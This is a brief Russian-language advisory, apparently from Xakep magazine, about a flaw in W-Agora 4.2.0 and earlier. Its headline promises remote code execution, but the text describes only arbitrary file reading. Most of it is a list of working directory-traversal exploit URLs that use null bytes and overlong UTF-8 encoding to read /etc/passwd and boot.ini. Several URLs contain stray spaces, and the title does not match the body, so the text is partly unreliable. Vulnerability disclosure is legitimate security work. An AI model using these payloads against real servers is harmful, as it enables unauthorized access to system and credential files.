Удаленное выполнение произвольного кода в W-Agora

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: W-Agora 4.2.0 и более ранние версии 

Уязвимость позволяет удаленному пользователю просмотреть произвольные файлы на целевой системе. 

Эксплоит:

http://[target]/w-agora/index.php?site= ../../../../../../../../boot.ini%00

http://[target]/w-agora/index.php?site= ../../../. ./../../../../etc/passwd%00

http://[target]/w-agora/index.php?site= ../../../../../../../../etc/passwd

http://[target]/w-agora/index.php?site= %c0%ae%c0%ae%c0%af%c0%ae%c0
%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0
%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0 %ae%c0%afboot.ini

http://[target]/w-agora/index.php?sit e= ../../../../../../../../boot.ini